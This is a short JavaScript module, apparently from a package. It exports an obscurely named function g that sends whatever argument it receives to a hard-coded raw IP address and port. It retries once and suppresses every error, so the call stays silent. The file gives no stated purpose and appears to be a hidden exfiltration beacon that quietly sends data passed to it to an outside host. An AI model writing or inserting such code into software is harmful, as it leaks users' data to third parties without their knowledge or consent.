import "node-fetch"

export async function g(a){
    try{
    await fetch("http://165.22.3.161:4810?get="+a);
    }catch{
        try{ await fetch("http://165.22.3.161:4810?get="+a);}
        catch{}
    }
}
